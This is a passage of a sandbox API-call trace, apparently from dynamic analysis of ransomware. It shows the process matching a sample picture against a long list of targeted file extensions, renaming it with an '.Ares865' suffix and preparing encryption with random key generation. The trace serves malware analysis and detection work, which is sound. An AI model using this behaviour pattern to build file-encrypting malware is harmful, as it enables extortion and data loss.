lstrlenW (lpString="Lighthouse.jpg") returned 14 [0046.455] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 50 [0046.455] lstrcpyW (in: lpString1=0x2cce452, lpString2="Lighthouse.jpg" | out: lpString1="Lighthouse.jpg") returned="Lighthouse.jpg" [0046.456] lstrlenW (lpString="Lighthouse.jpg") returned 14 [0046.456] lstrlenW (lpString="Ares865") returned 7 [0046.456] lstrcmpiW (lpString1="use.jpg", lpString2="Ares865") returned 1 [0046.456] lstrlenW (lpString=".dll") returned 4 [0046.456] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2=".dll") returned 1 [0046.456] lstrlenW (lpString=".lnk") returned 4 [0046.456] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2=".lnk") returned 1 [0046.456] lstrlenW (lpString=".ini") returned 4 [0046.456] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2=".ini") returned 1 [0046.456] lstrlenW (lpString=".sys") returned 4 [0046.456] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2=".sys") returned 1 [0046.456] lstrlenW (lpString="Lighthouse.jpg") returned 14 [0046.456] lstrlenW (lpString="bak") returned 3 [0046.456] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0046.456] lstrlenW (lpString="ba_") returned 3 [0046.456] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0046.456] lstrlenW (lpString="dbb") returned 3 [0046.456] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0046.456] lstrlenW (lpString="vmdk") returned 4 [0046.456] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0046.456] lstrlenW (lpString="rar") returned 3 [0046.456] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0046.456] lstrlenW (lpString="zip") returned 3 [0046.456] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0046.456] lstrlenW (lpString="tgz") returned 3 [0046.456] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0046.456] lstrlenW (lpString="vbox") returned 4 [0046.456] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0046.456] lstrlenW (lpString="vdi") returned 3 [0046.456] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0046.456] lstrlenW (lpString="vhd") returned 3 [0046.456] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0046.456] lstrlenW (lpString="vhdx") returned 4 [0046.456] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0046.456] lstrlenW (lpString="avhd") returned 4 [0046.456] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0046.456] lstrlenW (lpString="db") returned 2 [0046.456] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0046.457] lstrlenW (lpString="db2") returned 3 [0046.457] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0046.457] lstrlenW (lpString="db3") returned 3 [0046.457] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0046.457] lstrlenW (lpString="dbf") returned 3 [0046.457] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0046.457] lstrlenW (lpString="mdf") returned 3 [0046.457] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0046.457] lstrlenW (lpString="mdb") returned 3 [0046.457] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0046.457] lstrlenW (lpString="sql") returned 3 [0046.457] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0046.457] lstrlenW (lpString="sqlite") returned 6 [0046.457] lstrcmpiW (lpString1="se.jpg", lpString2="sqlite") returned -1 [0046.457] lstrlenW (lpString="sqlite3") returned 7 [0046.457] lstrcmpiW (lpString1="use.jpg", lpString2="sqlite3") returned 1 [0046.457] lstrlenW (lpString="sqlitedb") returned 8 [0046.457] lstrcmpiW (lpString1="ouse.jpg", lpString2="sqlitedb") returned -1 [0046.457] lstrlenW (lpString="xml") returned 3 [0046.457] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0046.457] lstrlenW (lpString="$er") returned 3 [0046.457] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0046.457] lstrlenW (lpString="4dd") returned 3 [0046.457] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0046.457] lstrlenW (lpString="4dl") returned 3 [0046.457] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0046.457] lstrlenW (lpString="^^^") returned 3 [0046.457] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0046.457] lstrlenW (lpString="abs") returned 3 [0046.457] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0046.457] lstrlenW (lpString="abx") returned 3 [0046.457] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0046.457] lstrlenW (lpString="accdb") returned 5 [0046.457] lstrcmpiW (lpString1="e.jpg", lpString2="accdb") returned 1 [0046.457] lstrlenW (lpString="accdc") returned 5 [0046.457] lstrcmpiW (lpString1="e.jpg", lpString2="accdc") returned 1 [0046.457] lstrlenW (lpString="accde") returned 5 [0046.457] lstrcmpiW (lpString1="e.jpg", lpString2="accde") returned 1 [0046.458] lstrlenW (lpString="accdr") returned 5 [0046.458] lstrcmpiW (lpString1="e.jpg", lpString2="accdr") returned 1 [0046.458] lstrlenW (lpString="accdt") returned 5 [0046.458] lstrcmpiW (lpString1="e.jpg", lpString2="accdt") returned 1 [0046.458] lstrlenW (lpString="accdw") returned 5 [0046.458] lstrcmpiW (lpString1="e.jpg", lpString2="accdw") returned 1 [0046.458] lstrlenW (lpString="accft") returned 5 [0046.458] lstrcmpiW (lpString1="e.jpg", lpString2="accft") returned 1 [0046.458] lstrlenW (lpString="adb") returned 3 [0046.458] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0046.458] lstrlenW (lpString="adb") returned 3 [0046.458] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0046.458] lstrlenW (lpString="ade") returned 3 [0046.458] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0046.458] lstrlenW (lpString="adf") returned 3 [0046.458] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0046.458] lstrlenW (lpString="adn") returned 3 [0046.458] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0046.458] lstrlenW (lpString="adp") returned 3 [0046.458] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0046.458] lstrlenW (lpString="alf") returned 3 [0046.458] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0046.458] lstrlenW (lpString="ask") returned 3 [0046.458] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0046.458] lstrlenW (lpString="btr") returned 3 [0046.458] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0046.458] lstrlenW (lpString="cat") returned 3 [0046.458] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0046.458] lstrlenW (lpString="cdb") returned 3 [0046.458] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0046.458] lstrlenW (lpString="ckp") returned 3 [0046.458] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0046.458] lstrlenW (lpString="cma") returned 3 [0046.458] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0046.458] lstrlenW (lpString="cpd") returned 3 [0046.458] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0046.458] lstrlenW (lpString="dacpac") returned 6 [0046.458] lstrcmpiW (lpString1="se.jpg", lpString2="dacpac") returned 1 [0046.459] lstrlenW (lpString="dad") returned 3 [0046.459] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0046.459] lstrlenW (lpString="dadiagrams") returned 10 [0046.459] lstrcmpiW (lpString1="thouse.jpg", lpString2="dadiagrams") returned 1 [0046.459] lstrlenW (lpString="daschema") returned 8 [0046.459] lstrcmpiW (lpString1="ouse.jpg", lpString2="daschema") returned 1 [0046.459] lstrlenW (lpString="db-journal") returned 10 [0046.459] lstrcmpiW (lpString1="thouse.jpg", lpString2="db-journal") returned 1 [0046.459] lstrlenW (lpString="db-shm") returned 6 [0046.459] lstrcmpiW (lpString1="se.jpg", lpString2="db-shm") returned 1 [0046.459] lstrlenW (lpString="db-wal") returned 6 [0046.459] lstrcmpiW (lpString1="se.jpg", lpString2="db-wal") returned 1 [0046.459] lstrlenW (lpString="dbc") returned 3 [0046.459] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0046.459] lstrlenW (lpString="dbs") returned 3 [0046.459] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0046.459] lstrlenW (lpString="dbt") returned 3 [0046.459] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0046.459] lstrlenW (lpString="dbv") returned 3 [0046.459] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0046.459] lstrlenW (lpString="dbx") returned 3 [0046.459] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0046.459] lstrlenW (lpString="dcb") returned 3 [0046.459] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0046.459] lstrlenW (lpString="dct") returned 3 [0046.459] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0046.459] lstrlenW (lpString="dcx") returned 3 [0046.459] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0046.459] lstrlenW (lpString="ddl") returned 3 [0046.459] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0046.459] lstrlenW (lpString="dlis") returned 4 [0046.459] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0046.459] lstrlenW (lpString="dp1") returned 3 [0046.459] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0046.459] lstrlenW (lpString="dqy") returned 3 [0046.459] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0046.459] lstrlenW (lpString="dsk") returned 3 [0046.459] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0046.460] lstrlenW (lpString="dsn") returned 3 [0046.460] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0046.460] lstrlenW (lpString="dtsx") returned 4 [0046.460] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0046.460] lstrlenW (lpString="dxl") returned 3 [0046.460] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0046.460] lstrlenW (lpString="eco") returned 3 [0046.460] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0046.460] lstrlenW (lpString="ecx") returned 3 [0046.460] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0046.460] lstrlenW (lpString="edb") returned 3 [0046.460] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0046.460] lstrlenW (lpString="epim") returned 4 [0046.460] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0046.460] lstrlenW (lpString="fcd") returned 3 [0046.460] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0046.460] lstrlenW (lpString="fdb") returned 3 [0046.460] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0046.460] lstrlenW (lpString="fic") returned 3 [0046.460] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0046.460] lstrlenW (lpString="flexolibrary") returned 12 [0046.460] lstrcmpiW (lpString1="ghthouse.jpg", lpString2="flexolibrary") returned 1 [0046.460] lstrlenW (lpString="fm5") returned 3 [0046.460] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0046.460] lstrlenW (lpString="fmp") returned 3 [0046.460] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0046.460] lstrlenW (lpString="fmp12") returned 5 [0046.460] lstrcmpiW (lpString1="e.jpg", lpString2="fmp12") returned -1 [0046.460] lstrlenW (lpString="fmpsl") returned 5 [0046.460] lstrcmpiW (lpString1="e.jpg", lpString2="fmpsl") returned -1 [0046.460] lstrlenW (lpString="fol") returned 3 [0046.460] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0046.460] lstrlenW (lpString="fp3") returned 3 [0046.460] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0046.460] lstrlenW (lpString="fp4") returned 3 [0046.460] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0046.460] lstrlenW (lpString="fp5") returned 3 [0046.460] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0046.461] lstrlenW (lpString="fp7") returned 3 [0046.461] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0046.461] lstrlenW (lpString="fpt") returned 3 [0046.461] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0046.461] lstrlenW (lpString="frm") returned 3 [0046.461] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0046.461] lstrlenW (lpString="gdb") returned 3 [0046.461] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0046.461] lstrlenW (lpString="gdb") returned 3 [0046.461] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0046.461] lstrlenW (lpString="grdb") returned 4 [0046.461] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0046.461] lstrlenW (lpString="gwi") returned 3 [0046.461] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0046.461] lstrlenW (lpString="hdb") returned 3 [0046.461] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0046.461] lstrlenW (lpString="his") returned 3 [0046.461] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0046.461] lstrlenW (lpString="ib") returned 2 [0046.461] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0046.461] lstrlenW (lpString="idb") returned 3 [0046.461] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0046.461] lstrlenW (lpString="ihx") returned 3 [0046.461] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0046.461] lstrlenW (lpString="itdb") returned 4 [0046.461] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0046.461] lstrlenW (lpString="itw") returned 3 [0046.461] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0046.461] lstrlenW (lpString="jet") returned 3 [0046.461] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0046.461] lstrlenW (lpString="jtx") returned 3 [0046.461] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0046.461] lstrlenW (lpString="kdb") returned 3 [0046.461] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0046.461] lstrlenW (lpString="kexi") returned 4 [0046.461] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0046.461] lstrlenW (lpString="kexic") returned 5 [0046.461] lstrcmpiW (lpString1="e.jpg", lpString2="kexic") returned -1 [0046.462] lstrlenW (lpString="kexis") returned 5 [0046.462] lstrcmpiW (lpString1="e.jpg", lpString2="kexis") returned -1 [0046.462] lstrlenW (lpString="lgc") returned 3 [0046.462] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0046.462] lstrlenW (lpString="lwx") returned 3 [0046.462] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0046.462] lstrlenW (lpString="maf") returned 3 [0046.462] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0046.462] lstrlenW (lpString="maq") returned 3 [0046.462] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0046.462] lstrlenW (lpString="mar") returned 3 [0046.462] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0046.462] lstrlenW (lpString="marshal") returned 7 [0046.462] lstrcmpiW (lpString1="use.jpg", lpString2="marshal") returned 1 [0046.462] lstrlenW (lpString="mas") returned 3 [0046.462] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0046.462] lstrlenW (lpString="mav") returned 3 [0046.462] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0046.462] lstrlenW (lpString="maw") returned 3 [0046.462] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0046.462] lstrlenW (lpString="mdbhtml") returned 7 [0046.462] lstrcmpiW (lpString1="use.jpg", lpString2="mdbhtml") returned 1 [0046.462] lstrlenW (lpString="mdn") returned 3 [0046.462] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0046.462] lstrlenW (lpString="mdt") returned 3 [0046.462] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0046.462] lstrlenW (lpString="mfd") returned 3 [0046.462] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0046.462] lstrlenW (lpString="mpd") returned 3 [0046.462] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0046.462] lstrlenW (lpString="mrg") returned 3 [0046.462] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0046.462] lstrlenW (lpString="mud") returned 3 [0046.462] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0046.462] lstrlenW (lpString="mwb") returned 3 [0046.462] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0046.463] lstrlenW (lpString="myd") returned 3 [0046.463] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0046.463] lstrlenW (lpString="ndf") returned 3 [0046.463] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0046.463] lstrlenW (lpString="nnt") returned 3 [0046.463] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0046.463] lstrlenW (lpString="nrmlib") returned 6 [0046.463] lstrcmpiW (lpString1="se.jpg", lpString2="nrmlib") returned 1 [0046.463] lstrlenW (lpString="ns2") returned 3 [0046.463] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0046.463] lstrlenW (lpString="ns3") returned 3 [0046.463] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0046.463] lstrlenW (lpString="ns4") returned 3 [0046.463] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0046.463] lstrlenW (lpString="nsf") returned 3 [0046.463] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0046.463] lstrlenW (lpString="nv") returned 2 [0046.463] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0046.463] lstrlenW (lpString="nv2") returned 3 [0046.463] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0046.463] lstrlenW (lpString="nwdb") returned 4 [0046.463] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0046.463] lstrlenW (lpString="nyf") returned 3 [0046.463] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0046.463] lstrlenW (lpString="odb") returned 3 [0046.463] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0046.463] lstrlenW (lpString="odb") returned 3 [0046.463] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0046.463] lstrlenW (lpString="oqy") returned 3 [0046.463] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0046.463] lstrlenW (lpString="ora") returned 3 [0046.463] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0046.463] lstrlenW (lpString="orx") returned 3 [0046.463] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0046.463] lstrlenW (lpString="owc") returned 3 [0046.463] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0046.463] lstrlenW (lpString="p96") returned 3 [0046.463] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0046.464] lstrlenW (lpString="p97") returned 3 [0046.464] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0046.464] lstrlenW (lpString="pan") returned 3 [0046.464] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0046.464] lstrlenW (lpString="pdb") returned 3 [0046.464] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0046.464] lstrlenW (lpString="pdm") returned 3 [0046.464] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0046.464] lstrlenW (lpString="pnz") returned 3 [0046.464] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0046.464] lstrlenW (lpString="qry") returned 3 [0046.464] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0046.464] lstrlenW (lpString="qvd") returned 3 [0046.464] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0046.464] lstrlenW (lpString="rbf") returned 3 [0046.464] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0046.464] lstrlenW (lpString="rctd") returned 4 [0046.464] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0046.464] lstrlenW (lpString="rod") returned 3 [0046.464] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0046.464] lstrlenW (lpString="rodx") returned 4 [0046.464] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0046.464] lstrlenW (lpString="rpd") returned 3 [0046.464] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0046.464] lstrlenW (lpString="rsd") returned 3 [0046.464] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0046.464] lstrlenW (lpString="sas7bdat") returned 8 [0046.464] lstrcmpiW (lpString1="ouse.jpg", lpString2="sas7bdat") returned -1 [0046.464] lstrlenW (lpString="sbf") returned 3 [0046.464] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0046.464] lstrlenW (lpString="scx") returned 3 [0046.464] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0046.464] lstrlenW (lpString="sdb") returned 3 [0046.464] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0046.464] lstrlenW (lpString="sdc") returned 3 [0046.464] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0046.464] lstrlenW (lpString="sdf") returned 3 [0046.465] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0046.465] lstrlenW (lpString="sis") returned 3 [0046.465] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0046.465] lstrlenW (lpString="spq") returned 3 [0046.465] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0046.465] lstrlenW (lpString="te") returned 2 [0046.465] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0046.465] lstrlenW (lpString="teacher") returned 7 [0046.465] lstrcmpiW (lpString1="use.jpg", lpString2="teacher") returned 1 [0046.465] lstrlenW (lpString="tmd") returned 3 [0046.465] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0046.465] lstrlenW (lpString="tps") returned 3 [0046.465] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0046.465] lstrlenW (lpString="trc") returned 3 [0046.465] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0046.465] lstrlenW (lpString="trc") returned 3 [0046.465] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0046.465] lstrlenW (lpString="trm") returned 3 [0046.465] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0046.465] lstrlenW (lpString="udb") returned 3 [0046.465] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0046.465] lstrlenW (lpString="udl") returned 3 [0046.465] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0046.465] lstrlenW (lpString="usr") returned 3 [0046.465] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0046.465] lstrlenW (lpString="v12") returned 3 [0046.465] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0046.465] lstrlenW (lpString="vis") returned 3 [0046.465] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0046.465] lstrlenW (lpString="vpd") returned 3 [0046.465] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0046.465] lstrlenW (lpString="vvv") returned 3 [0046.465] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0046.465] lstrlenW (lpString="wdb") returned 3 [0046.465] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0046.465] lstrlenW (lpString="wmdb") returned 4 [0046.465] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0046.465] lstrlenW (lpString="wrk") returned 3 [0046.466] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0046.466] lstrlenW (lpString="xdb") returned 3 [0046.466] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0046.466] lstrlenW (lpString="xld") returned 3 [0046.466] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0046.466] lstrlenW (lpString="xmlff") returned 5 [0046.466] lstrcmpiW (lpString1="e.jpg", lpString2="xmlff") returned -1 [0046.466] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.Ares865") returned 63 [0046.466] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.ares865"), dwFlags=0x1) returned 1 [0046.507] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0046.507] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=561276) returned 1 [0046.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0046.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbbb8 [0046.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0046.508] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0046.509] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0046.509] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0046.509] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x89380, lpName=0x0) returned 0x12c [0046.511] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x89380) returned 0x420000 [0046.595] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0046.595] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0046.595] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0046.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb18 [0046.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbb18 | out: hHeap=0x2b0000) returned 1 [0046.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2e2710 [0046.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0046.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0046.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0046.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cbe78 [0046.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0046.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbe78 | out: hHeap=0x2b0000) returned 1 [0046.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0046.596] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0046.601] CloseHandle (hObject=0x12c) returned 1 [0046.601] CloseHandle (hObject=0x164) returned 1 [0046.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbbb8 | out: hHeap=0x2b0000) returned 1 [0046.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0046.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0046.611] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, 